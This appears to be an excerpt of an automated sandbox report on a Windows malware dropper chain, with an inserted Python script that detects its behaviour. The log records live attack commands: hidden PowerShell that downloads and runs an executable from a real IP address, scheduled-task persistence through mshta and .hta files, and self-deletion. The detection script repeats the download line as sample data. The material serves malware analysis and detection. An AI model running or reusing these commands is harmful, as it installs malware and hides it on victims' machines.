Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE "C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "F80nHmaMuIn" /tr "mshta \"C:\Temp\J9hHfTRUK.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\J9hHfTRUK.hta"
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Process created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Process created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
Source: C:\Windows\System32\mshta.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
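The process-creation chain above is detectable from command lines alone: cmd.exe registers a scheduled task that runs mshta on a dropped .hta every 25 minutes, mshta launches a hidden powershell.exe that fetches http://176.113.115.7/mine/random.exe with WebClient.DownloadFile and starts it, cmd.exe deletes its parent after a timeout, and short PowerShell one-liners generate random names for the task and file. The Python below is an added example written for this report; it is neither Joe Sandbox output nor code from the malware. It runs four command-line rules over constructed process-creation events modelled on the entries above, extracts the download URL, and replays the $env:temp+'NAME' concatenation literally. That replay shows why the payload in this report is started from C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE (no backslash between Temp and the file name) rather than from inside the Temp folder, so a detection keyed only on a ...\Temp\ path prefix would miss that drop. The sample events, the rule names and the assumed value of %TEMP% are the example's own.

```python
import re
from typing import Optional

# Constructed sample process-creation events (parent image, child command line),
# modelled on the entries in this report; this is not live telemetry.
SAMPLE_EVENTS = [
    (r"C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe",
     r'"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f'),
    (r"C:\Windows\SysWOW64\mshta.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"'),
    # Benign control event; it must produce no findings.
    (r"C:\Windows\explorer.exe", r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'),
]

USER_WRITABLE = re.compile(r"(?i)(\\AppData\\|\\Temp\\|\\Users\\Public\\)")
URL_RE = re.compile(r"""https?://[^\s'"()]+""")
ENV_TEMP_CONCAT = re.compile(r"\$env:temp\+'([^']+)'", re.I)
ASSUMED_TEMP = r"C:\Users\user\AppData\Local\Temp"  # assumption: value of %TEMP% on the victim


def image_name(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def resolve_drop_path(cmdline: str, temp: str = ASSUMED_TEMP) -> Optional[str]:
    """Replay PowerShell's literal string concatenation $env:temp+'NAME'.

    $env:temp has no trailing backslash, so a NAME without a leading backslash
    is written as '<temp>NAME' beside the Temp folder, not inside it.
    """
    m = ENV_TEMP_CONCAT.search(cmdline)
    return temp + m.group(1) if m else None


def check_event(parent: str, cmdline: str) -> dict:
    """Return the rule names an event matches, URLs it carries and the resolved drop path."""
    rules = []
    p = image_name(parent)
    cl = cmdline.lower()

    # 1. mshta.exe spawning a hidden PowerShell that downloads a file and starts it.
    if (p == "mshta.exe" and "powershell" in cl and "-windowstyle hidden" in cl
            and ("downloadfile(" in cl or "downloadstring(" in cl) and "start-process" in cl):
        rules.append("mshta_powershell_download_execute")

    # 2. Persistence: scheduled task whose action runs mshta on an .hta in a user-writable directory.
    if ("schtasks" in cl and "/create" in cl and "mshta" in cl and ".hta" in cl
            and USER_WRITABLE.search(cmdline)):
        rules.append("schtasks_mshta_user_writable_hta")

    # 3. Self-delete: a non-cmd parent spawns cmd.exe to wait, then delete the parent's own image.
    if p != "cmd.exe" and "timeout" in cl and "del " in cl and parent.lower() in cl:
        rules.append("cmd_timeout_self_delete")

    # 4. Random-name generation via Get-Random over ASCII ranges (weak on its own; correlate).
    if "get-random" in cl and "[char]" in cl:
        rules.append("powershell_random_name_generation")

    return {"rules": rules, "urls": URL_RE.findall(cmdline), "drop_path": resolve_drop_path(cmdline)}


def scan(events):
    """Run every rule over (parent, cmdline) pairs; keep only events with findings."""
    hits = []
    for parent, cmdline in events:
        finding = check_event(parent, cmdline)
        if finding["rules"]:
            hits.append((parent, finding))
    return hits


if __name__ == "__main__":
    for parent, finding in scan(SAMPLE_EVENTS):
        print(image_name(parent), finding["rules"], finding["urls"], finding["drop_path"])
```

Rules 1 to 3 are high-fidelity on their own; rule 4 fires on ordinary administrative scripts too and is only useful when it appears alongside the others from the same parent chain. The URL and the resolved drop path are returned rather than printed so that they can be fed straight into a blocklist or a file-existence check on the host.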
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 18_2_006A0B62
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 18_2_006A1663
Source: 8e933e9d51.exe, 00000012.00000002.1531510429.0000000000702000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 8e933e9d51.exe | Binary or memory string: Shell_TrayWnd
Source: rapes.exe, rapes.exe, 00000003.00000002.1046903594.000000000043B000.00000040.00000001.01000000.00000007.sdmp, TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1637933726.000000000036B000.00000040.00000001.01000000.00000018.sdmp | Binary or memory string: /iProgram Manager
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0096A38F cpuid 13_2_0096A38F
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: EnumSystemLocalesW, 13_2_009820C8
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: EnumSystemLocalesW, 13_2_009781BC
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: EnumSystemLocalesW, 13_2_009821AE
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: EnumSystemLocalesW, 13_2_00982113
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 13_2_00982239
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: GetLocaleInfoW, 13_2_0098248C
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 13_2_009825B2
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: GetLocaleInfoW, 13_2_009826B8
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: GetLocaleInfoW, 13_2_009786DE
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 13_2_00982787
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 13_2_00981E26
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: EnumSystemLocalesW, 14_2_004220C8
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: EnumSystemLocalesW, 14_2_00422113
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: EnumSystemLocalesW, 14_2_004221AE
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: EnumSystemLocalesW, 14_2_004181BC
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 14_2_00422239
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: GetLocaleInfoW, 14_2_0042248C
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_004225B2
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: GetLocaleInfoW, 14_2_004186DE
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: GetLocaleInfoW, 14_2_004226B8
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 14_2_00422787
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 14_2_00421E26
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree, 17_2_0040CF60
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235930101\83f34278c7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235930101\83f34278c7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235950101\d101bd5267.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235950101\d101bd5267.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235960101\718edcc992.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10235960101\718edcc992.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10019520101\dw.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10019520101\dw.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
